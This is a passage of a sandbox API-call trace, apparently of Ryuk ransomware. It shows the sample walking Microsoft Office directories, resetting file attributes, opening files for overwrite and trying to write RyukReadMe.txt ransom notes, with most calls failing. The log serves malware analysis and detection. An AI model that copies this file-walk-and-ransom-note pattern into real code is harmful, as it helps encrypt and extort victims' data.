Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\SlateBlue.css", dwFileAttributes=0x80) returned 0 [0136.138] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\SlateBlue.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\slateblue.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.138] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.138] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.138] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.138] SetLastError (dwErrCode=0x0) [0136.138] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.138] GetLastError () returned 0x5 [0136.138] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0136.138] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.138] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\SoftBlue\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3b4940 [0136.138] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.138] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.138] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.139] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\SoftBlue\\background.gif", dwFileAttributes=0x80) returned 0 [0136.139] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\SoftBlue\\background.gif" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\softblue\\background.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.139] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.139] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.140] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.140] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.140] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\SoftBlue\\TAB_OFF.GIF", dwFileAttributes=0x80) returned 0 [0136.140] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\SoftBlue\\TAB_OFF.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\softblue\\tab_off.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.140] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.140] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.140] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.140] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.140] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\SoftBlue\\TAB_ON.GIF", dwFileAttributes=0x80) returned 0 [0136.141] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\SoftBlue\\TAB_ON.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\softblue\\tab_on.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.141] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.141] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.141] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0136.141] FindClose (in: hFindFile=0x3b4940 | out: hFindFile=0x3b4940) returned 1 [0136.141] SetLastError (dwErrCode=0x0) [0136.141] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\SoftBlue\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\softblue\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.141] GetLastError () returned 0x5 [0136.141] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0136.141] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.141] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.141] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.141] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\SoftBlue.css", dwFileAttributes=0x80) returned 0 [0136.142] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\SoftBlue.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\softblue.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.142] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.142] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.142] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.142] SetLastError (dwErrCode=0x0) [0136.142] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.142] GetLastError () returned 0x5 [0136.142] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0136.142] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.143] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Solutions\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3b4940 [0136.144] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.144] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.144] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.144] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Solutions\\arrow.png", dwFileAttributes=0x80) returned 0 [0136.144] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Solutions\\arrow.png" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\solutions\\arrow.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.144] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.144] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.144] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.144] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.145] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Solutions\\Document.gif", dwFileAttributes=0x80) returned 0 [0136.145] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Solutions\\Document.gif" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\solutions\\document.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.145] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.145] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.145] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.145] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.146] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Solutions\\Generic.gif", dwFileAttributes=0x80) returned 0 [0136.146] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Solutions\\Generic.gif" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\solutions\\generic.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.146] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.146] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.146] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.146] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.146] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Solutions\\gradient.png", dwFileAttributes=0x80) returned 0 [0136.147] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Solutions\\gradient.png" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\solutions\\gradient.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.147] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.147] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.147] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.147] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.147] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Solutions\\Main.gif", dwFileAttributes=0x80) returned 0 [0136.147] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Solutions\\Main.gif" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\solutions\\main.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.148] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.148] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.148] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.148] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.148] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Solutions\\Person.gif", dwFileAttributes=0x80) returned 0 [0136.148] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Solutions\\Person.gif" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\solutions\\person.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.148] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.148] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.148] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.148] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.149] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Solutions\\Response.gif", dwFileAttributes=0x80) returned 0 [0136.151] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Solutions\\Response.gif" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\solutions\\response.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.151] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.151] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.151] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0136.151] FindClose (in: hFindFile=0x3b4940 | out: hFindFile=0x3b4940) returned 1 [0136.152] SetLastError (dwErrCode=0x0) [0136.152] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Solutions\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\solutions\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.154] GetLastError () returned 0x5 [0136.154] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0136.154] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.154] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.154] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.155] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Solutions.css", dwFileAttributes=0x80) returned 0 [0136.155] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Solutions.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\solutions.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.155] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.155] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.155] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.155] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.155] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Solutions_Doc.css", dwFileAttributes=0x80) returned 0 [0136.155] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Solutions_Doc.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\solutions_doc.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.155] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.156] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.156] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.156] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.156] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Solutions_Generic.css", dwFileAttributes=0x80) returned 0 [0136.156] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Solutions_Generic.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\solutions_generic.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.156] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.156] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.156] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.156] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.157] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Solutions_Person.css", dwFileAttributes=0x80) returned 0 [0136.157] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Solutions_Person.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\solutions_person.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.157] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.157] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.157] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.157] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.157] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Solutions_Response.css", dwFileAttributes=0x80) returned 0 [0136.157] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Solutions_Response.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\solutions_response.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.157] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.157] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.157] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.157] SetLastError (dwErrCode=0x0) [0136.157] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.158] GetLastError () returned 0x5 [0136.158] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0136.158] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.158] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\SpringGreen\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3b4940 [0136.158] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.158] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.158] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.158] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\SpringGreen\\BUTTON.GIF", dwFileAttributes=0x80) returned 0 [0136.159] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\SpringGreen\\BUTTON.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\springgreen\\button.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.159] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.159] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.159] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.159] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.159] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\SpringGreen\\TAB_OFF.GIF", dwFileAttributes=0x80) returned 0 [0136.159] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\SpringGreen\\TAB_OFF.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\springgreen\\tab_off.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.159] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.160] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.160] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.160] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.160] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\SpringGreen\\TAB_ON.GIF", dwFileAttributes=0x80) returned 0 [0136.160] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\SpringGreen\\TAB_ON.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\springgreen\\tab_on.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.160] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.160] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.160] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0136.160] FindClose (in: hFindFile=0x3b4940 | out: hFindFile=0x3b4940) returned 1 [0136.160] SetLastError (dwErrCode=0x0) [0136.160] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\SpringGreen\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\springgreen\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.161] GetLastError () returned 0x5 [0136.161] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0136.161] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.161] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.161] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.161] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\SpringGreen.css", dwFileAttributes=0x80) returned 0 [0136.161] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\SpringGreen.css" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\springgreen.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.161] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.161] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) 